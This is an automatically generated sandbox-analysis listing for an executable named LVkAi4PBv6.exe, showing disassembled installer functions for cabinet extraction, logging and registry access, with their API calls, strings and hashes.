                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastWritelstrlen
                                                                                                                                                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 606256338-3545173039
                                                                                                                                                                                                                                                                                                  • Opcode ID: 2db7e901fdbd02fae5c968583e633620cd68f037143c4db027f2ab8add776110
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5b4455617a8b1d54f0b0e5b61b4af49aa0985f13eb7412faaa05521f9b48939d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2db7e901fdbd02fae5c968583e633620cd68f037143c4db027f2ab8add776110
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E411CD729C1525ABD3189AA5DD44FAB7A6EEB85760F114225FD01E7280D774AD00C9E0
                                                                                                                                                                                                                                                                                                  Function 005FFE21 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 60windowCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FormatMessageW.KERNELBASE(00000900,?,?,00000000,00000000,00000000,?,00000000,?,?,006004F4,?,?,?,?,00000001), ref: 005FFE40
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,006004F4,?,?,?,?,00000001,?,005C5616,?,?,00000000,?,?,005C5395,00000002), ref: 005FFE4C
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(00000000,?,?,00000000,?,?,006004F4,?,?,?,?,00000001,?,005C5616,?,?), ref: 005FFEB5
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                                                                                                                                                                                                                  • String ID: logutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1365068426-3545173039
                                                                                                                                                                                                                                                                                                  • Opcode ID: a171bdf2d6550371712ea8c72118a291c3b1b451c4f47fb4d59355a2a7121e19
                                                                                                                                                                                                                                                                                                  • Instruction ID: dd1475b3d3d265509be8684c9d81e29e1d50e753a92e424c94a8ad59367c1909
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a171bdf2d6550371712ea8c72118a291c3b1b451c4f47fb4d59355a2a7121e19
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3F115B32A4012EEBDB319F949D05EBF7E6AFF54710F018069FF0596561D7358A20D7A0
                                                                                                                                                                                                                                                                                                  Function 005E09EA Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 54fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005E140C: SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,005E0A19,?,?,?), ref: 005E1434
                                                                                                                                                                                                                                                                                                    • Part of subcall function 005E140C: GetLastError.KERNEL32(?,005E0A19,?,?,?), ref: 005E143E
                                                                                                                                                                                                                                                                                                  • ReadFile.KERNELBASE(?,?,?,?,00000000,?,?,?), ref: 005E0A27
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005E0A31
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to read during cabinet extraction., xrefs: 005E0A5F
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 005E0A55
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLast$PointerRead
                                                                                                                                                                                                                                                                                                  • String ID: Failed to read during cabinet extraction.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2170121939-2426083571
                                                                                                                                                                                                                                                                                                  • Opcode ID: d7ff2f0024c1f9218279907c616fa63c9146abed602bad1a758b6d2479a9a114
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8e980174e6f75065e9279936ab38f0011395fd6b568a3c39570d55f3364be258
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d7ff2f0024c1f9218279907c616fa63c9146abed602bad1a758b6d2479a9a114
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0011E137A4166ABBCB259F96DC08E9F7F6AFF08760B014169FD04A7290C7309910D7D4
                                                                                                                                                                                                                                                                                                  Function 005E140C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 47COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetFilePointerEx.KERNELBASE(?,?,?,00000000,00000000,?,?,?,00000000,?,005E0A19,?,?,?), ref: 005E1434
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005E0A19,?,?,?), ref: 005E143E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to move to virtual file pointer., xrefs: 005E146C
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 005E1462
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                                                                                  • String ID: Failed to move to virtual file pointer.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 2976181284-3005670968
                                                                                                                                                                                                                                                                                                  • Opcode ID: 82870e92ab3eda210f4665b46a1a65d28151c19ca345879c5252a16813a5100e
                                                                                                                                                                                                                                                                                                  • Instruction ID: c67f5a98210d8844fbd5758b33afd0d516b94966c684634f4a0bb35d26206bb5
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 82870e92ab3eda210f4665b46a1a65d28151c19ca345879c5252a16813a5100e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3601F233941A3ABBCB254A968C08E8BFF26FF40770712C129FD585A291DB319C10C6D8
                                                                                                                                                                                                                                                                                                  Function 005E07B5 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 34COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • SetEvent.KERNEL32(0060B478,00000000,?,005E1717,?,00000000,?,005CC287,?,005C5405,?,005D75A5,?,?,005C5405,?), ref: 005E07BF
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005E1717,?,00000000,?,005CC287,?,005C5405,?,005D75A5,?,?,005C5405,?,005C5445,00000001), ref: 005E07C9
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to set begin operation event., xrefs: 005E07F7
                                                                                                                                                                                                                                                                                                  • cabextract.cpp, xrefs: 005E07ED
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorEventLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to set begin operation event.$cabextract.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3848097054-4159625223
                                                                                                                                                                                                                                                                                                  • Opcode ID: f85099190a590df71e6d1d0b327867c188f858b1688151df668567167e90fef6
                                                                                                                                                                                                                                                                                                  • Instruction ID: ca2543d5716dea9051691fd910ca7620839488d91ab015717020b91793e0da6f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f85099190a590df71e6d1d0b327867c188f858b1688151df668567167e90fef6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6F05C3398367267D32816D64C09B8F7E85FF04B70B025129FE41BB2C0E650AC80C2D9
                                                                                                                                                                                                                                                                                                  Function 6D3773FC Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1366715162.000000006D361000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D360000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366691686.000000006D360000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366762621.000000006D38A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366786381.000000006D39B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1366806926.000000006D39D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_6d360000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                                                  • String ID: C:\Windows\Temp\{C5C6CF0D-9A4E-4872-8275-1B31F19D2062}\.cr\LVkAi4PBv6.exe
                                                                                                                                                                                                                                                                                                  • API String ID: 0-507524227
                                                                                                                                                                                                                                                                                                  • Opcode ID: dab5dc608078a78137920006fbf3a08574d8635870744fadcf9ae32b619a45e6
                                                                                                                                                                                                                                                                                                  • Instruction ID: 95164705e8455ba5f7d09a089badc106a6a0030e862bc05a7c842c05597f74b9
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dab5dc608078a78137920006fbf3a08574d8635870744fadcf9ae32b619a45e6
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CC4195B1E04A15AFCB32CF9DC8819AEBBBCEB85314F114066E644D7200E7759A41CB54
                                                                                                                                                                                                                                                                                                  Function 005C5123 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(burn.clean.room,?,?,?,?,005C1104,?,?,00000000), ref: 005C5142
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNELBASE(0000007F,00000001,?,0000000F,burn.clean.room,0000000F,?,?,?,?,005C1104,?,?,00000000), ref: 005C5172
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareStringlstrlen
                                                                                                                                                                                                                                                                                                  • String ID: burn.clean.room
                                                                                                                                                                                                                                                                                                  • API String ID: 1433953587-3055529264
                                                                                                                                                                                                                                                                                                  • Opcode ID: fa74cb198936ea409cc26ab22275e8a024bceb401ed1c0971c7d19b4b393498f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 721e07b1a22f8da84e407852820e007105f8832f4c7d43e0d1e1e22758cd3a1b
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: fa74cb198936ea409cc26ab22275e8a024bceb401ed1c0971c7d19b4b393498f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 64018672900A246F87344BC99D88F73BFBEFB15760B14911AF545C3610E7B0AC81C7A1
                                                                                                                                                                                                                                                                                                  Function 005C3838 Relevance: 4.6, APIs: 3, Instructions: 80libraryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005C3877
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 005C3881
                                                                                                                                                                                                                                                                                                  • LoadLibraryW.KERNELBASE(?,?,00000104,?), ref: 005C38EA
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: DirectoryErrorLastLibraryLoadSystem
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1230559179-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 77608922ac898089e8ec84429a71816f295732109872135186878293d1e9b3f9
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4dde8119bc8188e38cb829dbd80dc66dbdfd3333156cb7a662c069545f6aee50
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 77608922ac898089e8ec84429a71816f295732109872135186878293d1e9b3f9
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 8021B6B2D0123E6BDB209FA59C49F9B7B68BB44710F1185A9BD14E7241DA70DE4487D0
                                                                                                                                                                                                                                                                                                  Function 005C3A16 Relevance: 4.5, APIs: 3, Instructions: 21memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000,?,005C3BB6,00000000,?,005C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,005C13B8), ref: 005C3A20
                                                                                                                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,005C3BB6,00000000,?,005C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,005C13B8,000001C7,00000100), ref: 005C3A27
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,005C3BB6,00000000,?,005C1474,00000000,80004005,00000000,80004005,00000000,000001C7,?,005C13B8,000001C7,00000100,?), ref: 005C3A31
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$ErrorFreeLastProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 406640338-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 24321c39a61cce7db564aca79e8d7ec18d1cf959d5a6e7858e6502d2cd0437ff
                                                                                                                                                                                                                                                                                                  • Instruction ID: 70821bdafd0a16906f0e92e3d5345d67edbce0ed07cae71f14e510769598c4da
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 24321c39a61cce7db564aca79e8d7ec18d1cf959d5a6e7858e6502d2cd0437ff
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2D0C233A801395BC32017E65C0CA5B7F58EF04AA1701A024FD44D6220D721CC1082E4
                                                                                                                                                                                                                                                                                                  Function 005CF755 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00600F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0062AAA0,00000000,?,006057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00600F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,?,005D7D59,?,?,?), ref: 005CF7B9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00601026: RegQueryValueExW.ADVAPI32(00000004,?,00000000,00000000,?,00000000,?,00000000,?,?,?,005CF78E,00000000,Installed,00000000,?), ref: 0060104B
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseOpenQueryValue
                                                                                                                                                                                                                                                                                                  • String ID: Installed
                                                                                                                                                                                                                                                                                                  • API String ID: 3677997916-3662710971
                                                                                                                                                                                                                                                                                                  • Opcode ID: 4e033386d416738d71213e0ed0e815687a31e957886caeff260a6a05bcc07480
                                                                                                                                                                                                                                                                                                  • Instruction ID: f5924df8b2f26cb3158229ca3951db9524d4c761df5c66230b896b0c443ab0cb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4e033386d416738d71213e0ed0e815687a31e957886caeff260a6a05bcc07480
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FB018F32820118EFCB15DBD4C846FDEBBB9EF04711F1141A8E800AB150D7765E809790
                                                                                                                                                                                                                                                                                                  Function 00600F6C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 42registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,0062AAA0,00000000,?,006057E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 00600F80
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Open
                                                                                                                                                                                                                                                                                                  • String ID: regutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 71445658-955085611
                                                                                                                                                                                                                                                                                                  • Opcode ID: 1030752f7bcfd3d6ea27e75f979cb5df73c83ec7f68bceec53b1299d50f5abd0
                                                                                                                                                                                                                                                                                                  • Instruction ID: 94482d041eb6494a34a4d7fe7f6841553621977fb94d188af1e2a9a4eb43043f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1030752f7bcfd3d6ea27e75f979cb5df73c83ec7f68bceec53b1299d50f5abd0
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0BF0F6336811376AEB3809968C05FEBAE4BDB857B0F254535BD469A2D0E6218C11B6F0
                                                                                                                                                                                                                                                                                                  Function 005C394F Relevance: 3.0, APIs: 2, Instructions: 13memoryCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(?,000001C7,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3960
                                                                                                                                                                                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,005C2274,000001C7,00000001,80004005,8007139F,?,?,00600267,8007139F,?,00000000,00000000,8007139F), ref: 005C3967
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000002.00000002.1364890461.00000000005C1000.00000020.00000001.01000000.00000005.sdmp, Offset: 005C0000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364650693.00000000005C0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364930208.000000000060B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1364994267.000000000062A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000002.00000002.1365013197.000000000062D000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_5c0000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1357844191-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 461f9a2323e58002b96c4fcc4c5ce1b5894a7f3e02989c2a266fac8ef3823f98
                                                                                                                                                                                                                                                                                                  • Instruction ID: 7f8b34f512f03eb80e07d3585d0a9fa2b219daee3b6f8ec4593d05260c082e67
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 461f9a2323e58002b96c4fcc4c5ce1b5894a7f3e02989c2a266fac8ef3823f98
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 44C012321E420CABCB006FF8EC0EC9B3BADBB28602704E400B905C2120C738E0108B60
                                                                                                                                                                                                                                                                                                  Function 006035C3 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
